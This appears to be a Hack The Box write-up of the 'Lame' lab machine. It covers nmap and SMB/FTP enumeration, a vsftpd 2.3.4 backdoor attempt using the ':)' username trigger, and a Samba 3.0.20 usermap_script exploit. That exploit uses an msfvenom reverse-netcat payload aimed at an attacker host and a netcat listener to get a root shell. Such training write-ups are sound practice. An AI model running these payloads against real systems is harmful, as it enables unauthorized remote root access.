HacktheBox - Lame Writeup

23/08/2019

Initial Enumeration

1. Nmap Scan

Lets start with a scan of the target ip address:

nmap -sC -sV -oA nmap/initial.tcp 10.10.10.3

From the scan, we can see that there is a vsftpd FTP server that allows anonymous connections, the machine also allows SSH connections on port 22 and has SMB open on port 445, indicating there may be network shares accessible to us. 

FTP Enumeration 

We see that there is an FTP server running on the machine, the inital nmap scan also shows that it allows anonymous access. After logging in via anonymous, the FTP server didnt actually contain anything. 

ftp 10.10.10.3 -u anonymous -p <anything> 

The FTP server vsftpd version is 2.3.4, which is severly outdated and has an exploit available via metasploit -  exploit/unix/ftp/vsftpd_234_backdoor, Unfortunatly though, the metasploit module doesnt work against the machine. 

I also tried the manual backdoor exploitaiton method of putting a smiley face ':)' to the end of the username when connecting via telnet, but that didnt work either. 

telnet 10.10.10.3 21

USER user:) 

PASS pass 

2. SMB Enumeration

I used smbmap to see if there are any network shares and if we have any permissions on them. 

smbmap -H 10.10.10.3

We have read and write permissions to the tmp folder, but after using smbclient to connect to the share, it didnt contain anything of interest. 

smbclient //10.10.10.3/tmp -N

Looking back at the nmap scan output, The Samba smbd version is 3.0.20, this is also out of date and has exploits available, and just like the vsftpd, there is a metasploit module available for it: exploit/multi/samba/usermap_script

Exploitation

3. Samba smbd 3.0.20 manual exploitation 

As I am doing this and other boxes for OSCP practice, im going to try and complete as many of the boxes without the use of Metasploit, So im going to find an alternative way to root this machine.   

I found a python script that is a modified version of the metasploit module so I edited it accordingly to work on the vulnerable machine. 

Firstly, I created a python reverse netcat shellcode via msfvenom and added it to the python script. 

msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.15 LPORT=9999 -f python

I also had to find the SMBConnection script settings to use, I found this example then copied, edited and added it to my python script. 

My complete exploit python script, usermap-script.py:

After giving the python script execute permissions, we need to run a netcat listener.

chmod +x usermap-script.py

nc -lvnp 9999 

Once we have started the listener, we can run our python script. 

python usermap-script.py

We now have a connection on 10.10.10.3 and we can now make it an interactive connection. 

python -c 'import pty;pty.spawn("/bin/bash");' 

Confirmation that we are root, on the machine Lame:

whoami&&id&&hostname

As we are root, we are able to grab the user and root flags. 

The user.txt file was located in the user Makis home directory: 

And of course, the root.txt file was located in the root directory: 

That was the first of the OSCP like boxes completed, next up.. Legacy!